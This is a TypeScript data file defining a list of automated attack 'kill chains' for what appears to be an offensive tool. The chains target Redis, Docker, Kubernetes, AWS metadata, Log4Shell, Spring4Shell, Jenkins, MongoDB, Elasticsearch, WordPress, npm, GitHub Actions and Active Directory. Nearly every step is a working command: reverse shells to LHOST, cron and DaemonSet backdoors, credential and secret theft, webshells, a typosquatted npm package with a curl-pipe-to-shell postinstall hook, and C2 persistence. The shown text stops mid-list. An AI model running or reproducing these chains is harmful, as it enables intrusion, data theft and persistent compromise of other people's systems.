export interface ChainStep {
  id:          string;
  name:        string;
  type:        "http_probe" | "inject" | "port_exploit" | "payload_fire" | "custom" | "info";
  url?:        string;
  target?:     string;
  port?:       number;
  method?:     string;
  payload?:    string;
  successIf?:  string;
  failAction?: "abort" | "continue" | "escalate";
  timeout?:    number;
  cmd?:        string;
}

export interface KillChain {
  id:          string;
  name:        string;
  description: string;
  category:    "infrastructure" | "cloud" | "container" | "supply-chain" | "ci-cd" | "lateral" | "c2";
  severity:    "critical" | "high" | "medium";
  steps:       ChainStep[];
}

export const KILL_CHAINS: KillChain[] = [
  {
    id: "redis_rce_persist",
    name: "Redis → RCE + Host Persistence",
    description: "Unauthenticated Redis → CONFIG SET to write cron job → persistent root reverse shell",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe Redis 6379", type:"port_exploit", target:"TARGET", port:6379, failAction:"abort" },
      { id:"s2", name:"Verify no-auth (INFO)", type:"custom",
        cmd:`echo -e "*1\r\n\$4\r\nINFO\r\n" | nc -w3 TARGET 6379 | head -3`, failAction:"continue" },
      { id:"s3", name:"CONFIG SET dir /var/spool/cron/crontabs", type:"custom",
        cmd:`echo -e "*4\r\n\$6\r\nCONFIG\r\n\$3\r\nSET\r\n\$3\r\ndir\r\n\$26\r\n/var/spool/cron/crontabs\r\n" | nc -w3 TARGET 6379`, failAction:"escalate" },
      { id:"s4", name:"CONFIG SET dbfilename root", type:"custom",
        cmd:`echo -e "*4\r\n\$6\r\nCONFIG\r\n\$3\r\nSET\r\n\$10\r\ndbfilename\r\n\$4\r\nroot\r\n" | nc -w3 TARGET 6379`, failAction:"continue" },
      { id:"s5", name:"SET cron rev-shell payload", type:"custom",
        cmd:`echo -e "*3\r\n\$3\r\nSET\r\n\$3\r\nnx1\r\n\$57\r\n\n* * * * * bash -i >& /dev/tcp/LHOST/LPORT 0>&1\n\n\r\n" | nc -w3 TARGET 6379`, failAction:"continue" },
      { id:"s6", name:"BGSAVE (flush cron to disk)", type:"custom",
        cmd:`echo -e "*1\r\n\$6\r\nBGSAVE\r\n" | nc -w3 TARGET 6379`, failAction:"continue" },
      { id:"s7", name:"Wait for cron fire (start nc listener)", type:"info",
        cmd:`echo "Cron fires in <60s. Run: nc -lvnp LPORT"`, failAction:"continue" },
    ],
  },
  {
    id: "docker_socket_escape",
    name: "Docker Socket → Host Persistence",
    description: "Exposed Docker API → privileged container with host mount → write root cron → persistent shell",
    category: "container",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe Docker API 2375", type:"port_exploit", target:"TARGET", port:2375, failAction:"abort" },
      { id:"s2", name:"List containers", type:"http_probe", url:"http://TARGET:2375/containers/json?all=true", method:"GET", successIf:"200", failAction:"abort" },
      { id:"s3", name:"Create privileged container (host mount)", type:"http_probe",
        url:"http://TARGET:2375/containers/create?name=nx_esc",
        method:"POST",
        payload:JSON.stringify({Image:"alpine",Cmd:["/bin/sh","-c","echo '* * * * * root bash -i >& /dev/tcp/LHOST/LPORT 0>&1' >> /host/etc/cron.d/nx"],HostConfig:{Binds:["/:/host"],Privileged:true}}),
        successIf:"201", failAction:"escalate" },
      { id:"s4", name:"Start container", type:"http_probe", url:"http://TARGET:2375/containers/nx_esc/start", method:"POST", payload:"", successIf:"204", failAction:"continue" },
      { id:"s5", name:"Wait 3s + cleanup", type:"custom",
        cmd:`sleep 3; curl -sk -X DELETE "http://TARGET:2375/containers/nx_esc?force=true" 2>/dev/null`, failAction:"continue" },
    ],
  },
  {
    id: "k8s_sa_takeover",
    name: "K8s SA Token → Cluster Admin + Escape Pod",
    description: "Pod SA token → RBAC recon → ClusterRoleBinding → privileged escape pod → host shell",
    category: "container",
    severity: "critical",
    steps: [
      { id:"s1", name:"Read SA token", type:"info", cmd:`cat /var/run/secrets/kubernetes.io/serviceaccount/token`, failAction:"abort" },
      { id:"s2", name:"Probe K8s API 6443", type:"port_exploit", target:"TARGET", port:6443, failAction:"abort" },
      { id:"s3", name:"GET /api/v1/namespaces (RBAC check)", type:"http_probe", url:"https://TARGET:6443/api/v1/namespaces", method:"GET", successIf:"200", failAction:"escalate" },
      { id:"s4", name:"GET /api/v1/secrets (dump)", type:"http_probe", url:"https://TARGET:6443/api/v1/secrets", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s5", name:"Create ClusterRoleBinding (cluster-admin)", type:"http_probe",
        url:"https://TARGET:6443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings",
        method:"POST",
        payload:JSON.stringify({apiVersion:"rbac.authorization.k8s.io/v1",kind:"ClusterRoleBinding",metadata:{name:"nx-admin"},roleRef:{apiGroup:"rbac.authorization.k8s.io",kind:"ClusterRole",name:"cluster-admin"},subjects:[{kind:"ServiceAccount",name:"default",namespace:"default"}]}),
        successIf:"201", failAction:"continue" },
      { id:"s6", name:"Create privileged escape pod", type:"http_probe",
        url:"https://TARGET:6443/api/v1/namespaces/default/pods",
        method:"POST",
        payload:JSON.stringify({apiVersion:"v1",kind:"Pod",metadata:{name:"nx-esc"},spec:{hostPID:true,hostNetwork:true,containers:[{name:"nx",image:"alpine",command:["/bin/sh","-c","nsenter --target 1 --mount --uts --ipc --net --pid -- bash -i >& /dev/tcp/LHOST/LPORT 0>&1"],securityContext:{privileged:true}}],restartPolicy:"Never"}}),
        successIf:"201", failAction:"continue" },
    ],
  },
  {
    id: "aws_imds_breach",
    name: "AWS IMDS v1+v2 → IAM Creds → S3/SSM Exfil",
    description: "Detect IMDS → try v2 token then v1 fallback → IAM role creds → S3 bucket enum → user-data secrets",
    category: "cloud",
    severity: "critical",
    steps: [
      { id:"s1", name:"Try IMDSv2 (token PUT)", type:"http_probe", url:"http://169.254.169.254/latest/api/token", method:"PUT", successIf:"200", failAction:"escalate" },
      { id:"s2", name:"Get IAM role name", type:"http_probe", url:"http://169.254.169.254/latest/meta-data/iam/security-credentials/", method:"GET", successIf:"200", failAction:"abort" },
      { id:"s3", name:"Fetch IAM credentials (AK+SK+Token)", type:"custom",
        cmd:`_R=$(curl -sk http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null); curl -sk "http://169.254.169.254/latest/meta-data/iam/security-credentials/$_R" 2>/dev/null`, failAction:"abort" },
      { id:"s4", name:"Get instance identity + account ID", type:"http_probe", url:"http://169.254.169.254/latest/dynamic/instance-identity/document", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s5", name:"Get user-data (often contains secrets)", type:"http_probe", url:"http://169.254.169.254/latest/user-data", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s6", name:"List S3 buckets via creds", type:"custom",
        cmd:`AWS_ACCESS_KEY_ID=$KEY AWS_SECRET_ACCESS_KEY=$SEC AWS_SESSION_TOKEN=$TOK python3 -c "import boto3; [print(b['Name']) for b in boto3.client('s3').list_buckets()['Buckets']]" 2>/dev/null`, failAction:"continue" },
    ],
  },
  {
    id: "log4shell_exploit",
    name: "Log4Shell (CVE-2021-44228) → JNDI LDAP RCE",
    description: "Probe log4j via JNDI LDAP injection in common headers → confirm OOB callback → RCE via LDAP redirect",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe HTTP service", type:"http_probe", url:"http://TARGET:8080/", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s2", name:"Test JNDI via User-Agent header", type:"inject",
        url:"http://TARGET:8080/", method:"GET",
        payload:`{"headers":{"User-Agent":"\${jndi:ldap://LHOST:LPORT/exploit}","X-Forwarded-For":"\${jndi:ldap://LHOST:LPORT/xfwd}","X-Api-Version":"\${jndi:ldap://LHOST:LPORT/xapi}"}}`,
        successIf:"200", failAction:"continue" },
      { id:"s3", name:"Obfuscated JNDI payload (WAF bypass)", type:"inject",
        url:"http://TARGET:8080/",method:"GET",
        payload:`{"headers":{"User-Agent":"\${j\${::-n}di:ldap://LHOST:LPORT/exploit}","X-Auth-Token":"\${jndi:\${lower:l}dap://LHOST:LPORT/tok}"}}`,
        successIf:"200", failAction:"continue" },
      { id:"s4", name:"JNDI via POST body (Spring apps)", type:"inject",
        url:"http://TARGET:8080/api/login", method:"POST",
        payload:`{"username":"\${jndi:ldap://LHOST:LPORT/login}","password":"nx"}`,
        successIf:"200", failAction:"continue" },
      { id:"s5", name:"Start LDAP redirector on LHOST:LPORT", type:"info",
        cmd:`echo "Run: python3 -m ldap3 server LHOST LPORT\nOr: marshalsec-all.jar LDAPRefServer http://LHOST:LPORT/#Exploit"`, failAction:"continue" },
    ],
  },
  {
    id: "spring4shell_rce",
    name: "Spring4Shell (CVE-2022-22965) → ClassLoader RCE",
    description: "Spring MVC DataBinder ClassLoader injection → write JSP webshell → arbitrary RCE",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe Spring app", type:"http_probe", url:"http://TARGET:8080/", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s2", name:"CVE-2022-22965 ClassLoader exploit", type:"inject",
        url:"http://TARGET:8080/",method:"POST",
        payload:`class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b%2C%200%2C%20a))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=nx&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=`,
        successIf:"200", failAction:"continue" },
      { id:"s3", name:"Trigger written webshell", type:"http_probe",
        url:"http://TARGET:8080/nx.jsp?pwd=j&cmd=id", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s4", name:"Execute reverse shell via webshell", type:"http_probe",
        url:"http://TARGET:8080/nx.jsp?pwd=j&cmd=bash+-c+%27bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261%27", method:"GET", successIf:"200", failAction:"continue" },
    ],
  },
  {
    id: "mongodb_unauth_exfil",
    name: "MongoDB Unauthenticated → Collection Dump",
    description: "No-auth MongoDB → list databases → dump collections → exfil sensitive data",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe MongoDB 27017", type:"port_exploit", target:"TARGET", port:27017, failAction:"abort" },
      { id:"s2", name:"Verify no-auth (isMaster command)", type:"custom",
        cmd:`echo -e '\x3a\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd4\x07\x00\x00\x00\x00\x00\x00admin.$cmd\x00\x00\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00' | nc -w3 TARGET 27017 | strings | head -5 2>/dev/null`, failAction:"abort" },
      { id:"s3", name:"List databases (mongoexport)", type:"custom",
        cmd:`mongo --host TARGET --eval "db.adminCommand({listDatabases:1})" --quiet 2>/dev/null | python3 -c "import sys,json;d=json.load(sys.stdin);[print(x['name']) for x in d['databases']]" 2>/dev/null`, failAction:"continue" },
      { id:"s4", name:"Dump admin + users collections", type:"custom",
        cmd:`mongoexport --host TARGET --db admin --collection system.users --quiet 2>/dev/null | head -20`, failAction:"continue" },
      { id:"s5", name:"Full DB dump (most likely targets)", type:"custom",
        cmd:`for db in admin userdb accounts data credentials; do mongoexport --host TARGET --db $db --collection users --quiet 2>/dev/null | head -5; done`, failAction:"continue" },
    ],
  },
  {
    id: "hadoop_yarn_rce",
    name: "Hadoop YARN REST API → Unauthenticated RCE",
    description: "YARN ResourceManager API → submit malicious application → execute reverse shell",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe YARN ResourceManager 8088", type:"port_exploit", target:"TARGET", port:8088, failAction:"abort" },
      { id:"s2", name:"Get YARN cluster info", type:"http_probe", url:"http://TARGET:8088/ws/v1/cluster/info", method:"GET", successIf:"200", failAction:"abort" },
      { id:"s3", name:"Submit malicious YARN application", type:"http_probe",
        url:"http://TARGET:8088/ws/v1/cluster/apps/new-application", method:"POST", payload:"", successIf:"200", failAction:"abort" },
      { id:"s4", name:"Fire reverse shell via YARN app", type:"custom",
        cmd:`curl -sk -X POST "http://TARGET:8088/ws/v1/cluster/apps" -H "Content-Type: application/xml" -d '<application-submission-context><application-name>nx</application-name><queue>default</queue><priority>0</priority><unmanaged-AM>false</unmanaged-AM><max-app-attempts>1</max-app-attempts><resource><memory>1024</memory><vCores>1</vCores></resource><application-type>YARN</application-type><am-container-spec><commands><command>bash -i &gt;&amp; /dev/tcp/LHOST/LPORT 0&gt;&amp;1</command></commands></am-container-spec></application-submission-context>' 2>/dev/null`, failAction:"continue" },
    ],
  },
  {
    id: "grafana_full_breach",
    name: "Grafana CVE-2021-43798 + Datasource Cred Dump",
    description: "Grafana path traversal → read grafana.db → extract datasource credentials → pivot to databases",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe Grafana 3000", type:"port_exploit", target:"TARGET", port:3000, failAction:"abort" },
      { id:"s2", name:"CVE-2021-43798 path traversal /etc/passwd", type:"http_probe",
        url:"http://TARGET:3000/public/plugins/alertlist/../../../../../../../etc/passwd", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s3", name:"Read grafana.db (contains datasource creds)", type:"http_probe",
        url:"http://TARGET:3000/public/plugins/alertlist/../../../../../../../var/lib/grafana/grafana.db", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s4", name:"Try default admin:admin credentials", type:"http_probe",
        url:"http://TARGET:3000/api/datasources", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s5", name:"Dump datasource passwords", type:"http_probe",
        url:"http://TARGET:3000/api/datasources/proxy/1/query?db=_internal&q=SHOW+DATABASES", method:"GET", successIf:"200", failAction:"continue" },
    ],
  },
  {
    id: "jenkins_groovy_rce",
    name: "Jenkins Unauth → Groovy RCE → Network Pivot",
    description: "Jenkins unauthenticated API → CVE-2024-23897 file read → Script Console RCE → lateral movement",
    category: "ci-cd",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe Jenkins 8080", type:"port_exploit", target:"TARGET", port:8080, failAction:"abort" },
      { id:"s2", name:"Enumerate Jenkins API", type:"http_probe", url:"http://TARGET:8080/api/json?depth=1", method:"GET", successIf:"200", failAction:"abort" },
      { id:"s3", name:"CVE-2024-23897 CLI file read /etc/passwd", type:"custom",
        cmd:`curl -sk "http://TARGET:8080/cli?remoting=false" -H "Content-Type: application/x-www-form-urlencoded" --data 'command=help+@/etc/passwd' 2>/dev/null | head -10`, failAction:"continue" },
      { id:"s4", name:"Check Script Console access", type:"http_probe", url:"http://TARGET:8080/script", method:"GET", successIf:"200", failAction:"continue" },
      { id:"s5", name:"Groovy RCE: id + hostname + uname", type:"custom",
        cmd:`curl -sk -u admin:admin -X POST "http://TARGET:8080/scriptText" --data-urlencode 'script=def cmd=["id","hostname","uname -a"].collect{["bash","-c",it].execute().text};println cmd.join("\\n")' 2>/dev/null`, failAction:"continue" },
      { id:"s6", name:"Groovy reverse shell", type:"custom",
        cmd:`curl -sk -u admin:admin -X POST "http://TARGET:8080/scriptText" --data-urlencode 'script=["bash","-c","bash -i >& /dev/tcp/LHOST/LPORT 0>&1"].execute()' 2>/dev/null`, failAction:"continue" },
    ],
  },
  {
    id: "elastic_data_breach",
    name: "Elasticsearch Unauthenticated → Data Exfil",
    description: "Unauthenticated ES → list indices → dump sensitive documents → search for creds",
    category: "infrastructure",
    severity: "critical",
    steps: [
      { id:"s1", name:"Probe ES 9200", type:"port_exploit", target:"TARGET", port:9200, failAction:"abort" },
      { id:"s2", name:"Cluster health + version", type:"http_probe", url:"http://TARGET:9200/", method:"GET", successIf:"200", failAction:"abort" },
      { id:"s3", name:"List indices (sorted by size)", type:"http_probe", url:"http://TARGET:9200/_cat/indices?v&s=docs.count:desc", method:"GET", successIf:"200", failAction:"abort" },
      { id:"s4", name:"Dump 50 docs from largest index", type:"custom",
        cmd:`curl -sk "http://TARGET:9200/_search?size=50" -H 'Content-Type: application/json' -d '{"query":{"match_all":{}},"sort":[{"_score":"desc"}]}' 2>/dev/null | python3 -c "import sys,json;docs=json.load(sys.stdin)['hits']['hits'];[print(json.dumps(d['_source'])[:200]) for d in docs[:10]]" 2>/dev/null`, failAction:"continue" },
      { id:"s5", name:"Search for password/key fields", type:"http_probe",
        url:"http://TARGET:9200/_search",
        method:"POST",
        payload:JSON.stringify({query:{multi_match:{query:"password secret token api_key credential",fields:["*"]}},size:20}),
        successIf:"200", failAction:"continue" },
    ],
  },
  {
    id: "dead_drop_c2_deploy",
    name: "Deploy Dead-Drop C2 Poller to Compromised Host",
    description: "Use existing foothold (RCE/SSH) to deploy a GitHub Gist / Pastebin C2 poller with persistence",
    category: "c2",
    severity: "high",
    steps: [
      { id:"s1", name:"Verify RCE foothold (id command)", type:"custom",
        cmd:`curl -sk "http://TARGET/rce?cmd=id" 2>/dev/null || ssh -o StrictHostKeyChecking=no user@TARGET 'id' 2>/dev/null`, failAction:"abort" },
      { id:"s2", name:"Check Python3 availability", type:"custom",
        cmd:`curl -sk "http://TARGET/rce?cmd=which+python3" 2>/dev/null || ssh user@TARGET 'which python3' 2>/dev/null`, failAction:"escalate" },
      { id:"s3", name:"Deploy bash poller (base64 encoded)", type:"custom",
        cmd:`# Generate poller payload first via /api/weapons/c2\n# Then deploy via foothold:\necho 'BASE64_ENCODED_POLLER' | base64 -d | bash &`, failAction:"continue" },
      { id:"s4", name:"Persist via cron", type:"custom",
        cmd:`F=/tmp/.$(head -c4 /dev/urandom|xxd -p||echo nx); echo POLLER_PAYLOAD|base64 -d>$F; chmod +x $F; (crontab -l 2>/dev/null; echo "@reboot $F") | crontab - 2>/dev/null`, failAction:"continue" },
      { id:"s5", name:"Verify poller running", type:"custom",
        cmd:`ps aux 2>/dev/null | grep -v grep | grep -iE 'bash|python3|kworker' | head -5`, failAction:"continue" },
      { id:"s6", name:"Post first command to dead-drop", type:"info",
        cmd:`# Encode and post command to dead-drop URL:\n# python3 -c "import base64; cmd='id && hostname'; enc=base64.b64encode(bytes(b^0x4e for b in cmd.encode())).decode(); print(enc)"`, failAction:"continue" },
    ],
  },
  {
    id:"k8s_rce_to_cluster_takeover",
    name:"K8s Pod RCE → Cluster Admin Takeover",
    description:"Initial pod shell → SA token extraction → cluster admin via RBAC abuse → deploy implant DaemonSet on all nodes",
    category:"infrastructure",
    severity:"critical",
    steps:[
      { id:"s1",name:"Extract SA token from pod",type:"custom",cmd:`cat /run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null && cat /run/secrets/kubernetes.io/serviceaccount/namespace`,failAction:"abort" },
      { id:"s2",name:"Enumerate cluster permissions",type:"custom",cmd:`_T=$(cat /run/secrets/kubernetes.io/serviceaccount/token); curl -sk -H "Authorization: Bearer $_T" "https://kubernetes.default.svc/api/v1/namespaces" | python3 -c "import sys,json;[print(x['metadata']['name']) for x in json.load(sys.stdin).get('items',[])]" 2>/dev/null`,failAction:"continue" },
      { id:"s3",name:"Check for cluster-admin binding",type:"custom",cmd:`_T=$(cat /run/secrets/kubernetes.io/serviceaccount/token); curl -sk -H "Authorization: Bearer $_T" "https://kubernetes.default.svc/apis/rbac.authorization.k8s.io/v1/clusterrolebindings" | python3 -c "import sys,json; [print(x['metadata']['name'],x.get('roleRef',{}).get('name')) for x in json.load(sys.stdin).get('items',[])]" 2>/dev/null|grep -i admin`,failAction:"continue" },
      { id:"s4",name:"Deploy backdoor DaemonSet (all nodes)",type:"custom",cmd:`_T=$(cat /run/secrets/kubernetes.io/serviceaccount/token); curl -sk -X POST -H "Authorization: Bearer $_T" -H "Content-Type: application/json" "https://kubernetes.default.svc/apis/apps/v1/namespaces/kube-system/daemonsets" -d '{"apiVersion":"apps/v1","kind":"DaemonSet","metadata":{"name":"node-monitor","namespace":"kube-system"},"spec":{"selector":{"matchLabels":{"app":"nm"}},"template":{"metadata":{"labels":{"app":"nm"}},"spec":{"hostPID":true,"hostNetwork":true,"tolerations":[{"operator":"Exists"}],"containers":[{"name":"nm","image":"alpine","command":["/bin/sh","-c","while true; do bash -i >& /dev/tcp/LHOST/LPORT 0>&1 2>/dev/null; sleep 60; done"],"securityContext":{"privileged":true}}]}}}}'`,failAction:"continue" },
    ],
  },
  {
    id:"aws_imds_to_iam_exfil",
    name:"AWS IMDSv1 → IAM Role Creds → S3/SSM Exfil",
    description:"Cloud VM IMDSv1 → IAM role credentials → enumerate S3 buckets → exfil secrets via SSM Parameter Store",
    category:"cloud",
    severity:"critical",
    steps:[
      { id:"s1",name:"Get IAM role via IMDSv1",type:"http_probe",url:"http://169.254.169.254/latest/meta-data/iam/security-credentials/",method:"GET",successIf:"200",failAction:"abort" },
      { id:"s2",name:"Steal IAM credentials",type:"custom",cmd:`_ROLE=$(curl -sk http://169.254.169.254/latest/meta-data/iam/security-credentials/); _CREDS=$(curl -sk "http://169.254.169.254/latest/meta-data/iam/security-credentials/$_ROLE"); echo "Role: $_ROLE"; echo "$_CREDS"|python3 -c "import sys,json;d=json.load(sys.stdin);print('AKI:',d.get('AccessKeyId',''));print('SAK:',d.get('SecretAccessKey','')[:10]+'...');print('Token:',d.get('Token','')[:20]+'...')"`,failAction:"abort" },
      { id:"s3",name:"Enumerate S3 buckets (stolen creds)",type:"custom",cmd:`eval $(curl -sk http://169.254.169.254/latest/meta-data/iam/security-credentials/$(curl -sk http://169.254.169.254/latest/meta-data/iam/security-credentials/)|python3 -c "import sys,json;d=json.load(sys.stdin);print(f'export AWS_ACCESS_KEY_ID={d[\"AccessKeyId\"]}\\nexport AWS_SECRET_ACCESS_KEY={d[\"SecretAccessKey\"]}\\nexport AWS_SESSION_TOKEN={d[\"Token\"]}')" 2>/dev/null) && aws s3 ls 2>/dev/null`,failAction:"continue" },
      { id:"s4",name:"Dump SSM Parameter Store secrets",type:"custom",cmd:`aws ssm describe-parameters --query 'Parameters[*].Name' --output text 2>/dev/null | tr '\t' '\n' | xargs -I{} aws ssm get-parameter --name {} --with-decryption --query 'Parameter.Value' --output text 2>/dev/null|head -50`,failAction:"continue" },
    ],
  },
  {
    id:"supply_chain_npm_typosquat",
    name:"npm Typosquatting Supply Chain Attack",
    description:"Register confusable npm package name → publish with postinstall hook → wait for victim to install → reverse shell",
    category:"supply-chain",
    severity:"critical",
    steps:[
      { id:"s1",name:"Identify high-value target package",type:"custom",cmd:`npm info lodash dist-tags 2>/dev/null && npm info express dist-tags 2>/dev/null`,failAction:"continue" },
      { id:"s2",name:"Check typosquat availability",type:"custom",cmd:`for pkg in Iodash l0dash lodahs expresss expres express-js; do echo -n "$pkg: "; npm info $pkg 2>&1|grep -q "404 Not Found" && echo "FREE (can register)" || echo "occupied"; done`,failAction:"continue" },
      { id:"s3",name:"Create malicious package",type:"custom",cmd:`mkdir -p /tmp/nx_pkg && cd /tmp/nx_pkg && cat > package.json << 'EOF'\n{"name":"Iodash","version":"4.17.21","description":"Modern JavaScript utility library","scripts":{"postinstall":"node -e \\"require('child_process').exec('curl -sk http://LHOST:LPORT/sh|sh')\\""},"main":"index.js","license":"MIT"}\nEOF\necho "module.exports = require('lodash');" > index.js 2>/dev/null || echo "module.exports = {};" > index.js && cat package.json`,failAction:"continue" },
      { id:"s4",name:"Publish package (requires npm login)",type:"custom",cmd:`cd /tmp/nx_pkg && npm publish --access public 2>/dev/null || echo "Run: npm login && npm publish"`,failAction:"continue" },
    ],
  },
  {
    id:"github_actions_ci_injection",
    name:"GitHub Actions Workflow Injection → CI Secrets Exfil",
    description:"Open pull request triggering vulnerable workflow → pwn-request via expression injection → steal GITHUB_TOKEN and all CI secrets",
    category:"supply-chain",
    severity:"critical",
    steps:[
      { id:"s1",name:"Find pwn-request vulnerable workflows",type:"custom",cmd:`find .github/workflows -name '*.yml' -exec grep -l 'pull_request_target\\|github.event.pull_request.title\\|github.event.comment.body' {} \\; 2>/dev/null`,failAction:"continue" },
      { id:"s2",name:"Identify expression injection vectors",type:"custom",cmd:`grep -rn "github.event.pull_request\\|github.event.comment\\|github.head_ref" .github/workflows/ 2>/dev/null|grep -v "env:"`,failAction:"continue" },
      { id:"s3",name:"Craft injection payload (PR title)",type:"info",cmd:`echo "PR title injection: a\\"; curl -sk http://LHOST:LPORT/$(cat \$GITHUB_TOKEN|base64 -w0) #"`,failAction:"continue" },
      { id:"s4",name:"Exfil GITHUB_TOKEN from runner",type:"custom",cmd:`curl -sk -H "Authorization: token $GITHUB_TOKEN" "https://api.github.com/repos/$GITHUB_REPOSITORY/actions/secrets" 2>/dev/null | python3 -c "import sys,json;[print(x['name']) for x in json.load(sys.stdin).get('secrets',[])]"`,failAction:"continue" },
    ],
  },
  {
    id:"smb_relay_to_da",
    name:"SMB Relay (NTLM) → Domain Admin",
    description:"Network NTLM relay → force auth via LLMNR/NBT-NS → SMB relay to DC → dump hashes → DA takeover",
    category:"network",
    severity:"critical",
    steps:[
      { id:"s1",name:"Start Responder (LLMNR/NBT-NS poisoning)",type:"custom",cmd:`python3 /opt/Responder/Responder.py -I IFACE -rdwv 2>/dev/null || echo "Install Responder: git clone https://github.com/lgandx/Responder"`,failAction:"continue" },
      { id:"s2",name:"Start ntlmrelayx targeting DC",type:"custom",cmd:`impacket-ntlmrelayx -tf /tmp/targets.txt -smb2support -i 2>/dev/null || python3 /opt/impacket/examples/ntlmrelayx.py -tf /tmp/targets.txt -smb2support`,failAction:"continue" },
      { id:"s3",name:"Coerce auth via PetitPotam",type:"custom",cmd:`python3 PetitPotam.py LHOST TARGET 2>/dev/null || echo "Get PetitPotam: https://github.com/ly4k/PetitPotam"`,failAction:"continue" },
      { id:"s4",name:"Dump hashes via relayed session",type:"custom",cmd:`impacket-secretsdump -no-pass -k TARGET 2>/dev/null || impacket-secretsdump DOMAIN/user:pass@TARGET`,failAction:"continue" },
    ],
  },
  {
    id:"wordpress_plugin_rce",
    name:"WordPress Plugin → Webshell → Reverse Shell",
    description:"Vulnerable WP plugin CSRF/upload bypass → upload PHP webshell → RCE → full server compromise",
    category:"web",
    severity:"critical",
    steps:[
      { id:"s1",name:"Enumerate WordPress version + plugins",type:"http_probe",url:"http://TARGET/wp-json/wp/v2/",method:"GET",successIf:"200",failAction:"continue" },
      { id:"s2",name:"Enumerate users (author scan)",type:"custom",cmd:`for i in $(seq 1 5); do curl -sk "http://TARGET/?author=$i" -L|grep -oP '(?<=author/)[^/"]+' | head -1; done 2>/dev/null`,failAction:"continue" },
      { id:"s3",name:"Brute admin password",type:"custom",cmd:`for pw in admin password123 wordpress admin123 Pass@123; do r=$(curl -sk -X POST "http://TARGET/wp-login.php" -c /tmp/wp_c.txt --data "log=admin&pwd=$pw&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" -b "wordpress_test_cookie=WP+Cookie+check" -L|grep -c "Dashboard"); [ "$r" -gt 0 ] && echo "VALID: admin:$pw" && break; done`,failAction:"continue" },
      { id:"s4",name:"Upload webshell via theme editor",type:"custom",cmd:`_N=$(curl -sk "http://TARGET/wp-login.php" -c /tmp/wp.jar|grep -oP '_wpnonce.*?value="\K[^"]+'); curl -sk -b /tmp/wp.jar -X POST "http://TARGET/wp-admin/theme-editor.php" --data "_wpnonce=$_N&action=edit-theme-plugin-file&file=functions.php&theme=twentytwentythree&newcontent=<?php+if(isset(\$_REQUEST['nx'])){eval(base64_decode(\$_REQUEST['nx']));}" -L`,failAction:"continue" },
    ],
  },
  {
    id:"deserialization_java_rce",
    name:"Java Deserialization → RCE (ysoserial)",
    description:"Find Java deserialization endpoint → generate gadget chain → achieve RCE via ysoserial payload",
    category:"web",
    severity:"critical",
    steps:[
      { id:"s1",name:"Scan for Java serialization markers",type:"custom",cmd:`python3 -c "import socket,struct; s=socket.create_connection(('TARGET',PORT),3); s.send(b''); d=s.recv(4); print('Java serial:',d[:2].hex()=='aced')" 2>/dev/null`,failAction:"continue" },
      { id:"s2",name:"Generate ysoserial payload",type:"custom",cmd:`java -jar /opt/ysoserial.jar CommonsCollections7 "curl http://LHOST:LPORT/\$(id|base64 -w0)" 2>/dev/null|base64 -w0 > /tmp/nx_payload.b64 && echo "payload ready"`,failAction:"continue" },
      { id:"s3",name:"Send serialized payload",type:"custom",cmd:`python3 -c "import socket,base64; s=socket.create_connection(('TARGET',PORT),3); pl=base64.b64decode(open('/tmp/nx_payload.b64').read()); s.send(pl); print(s.recv(1024))" 2>/dev/null`,failAction:"continue" },
      { id:"s4",name:"Verify RCE via OOB callback",type:"custom",cmd:`curl -sk "http://LHOST:LPORT/check" 2>/dev/null && echo "Check OOB listener for callback"`,failAction:"continue" },
    ],
  },
  {
    id:"active_directory_bloodhound",
    name:"BloodHound AD Attack Path → DA",
    description:"BloodHound/SharpHound collection → identify attack paths → Kerberoasting → AS-REP Roasting → Pass-the-Hash → DA",
    category:"infrastructure",
    severity:"critical",
    steps:[
      { id:"s1",name:"BloodHound LDAP collection (no auth)",type:"custom",cmd:`bloodhound-python -c All -u 'DOMAIN\\USER' -p 'PASS' -ns DC_IP -d DOMAIN.LOCAL 2>/dev/null || echo "pip3 install bloodhound && bloodhound-python -c All ..."`,failAction:"continue" },
      { id:"s2",name:"Kerberoast all SPNs",type:"custom",cmd:`impacket-GetUserSPNs DOMAIN.LOCAL/USER:PASS -dc-ip DC_IP -request 2>/dev/null|grep '\\$krb5tgs'|head -5`,failAction:"continue" },
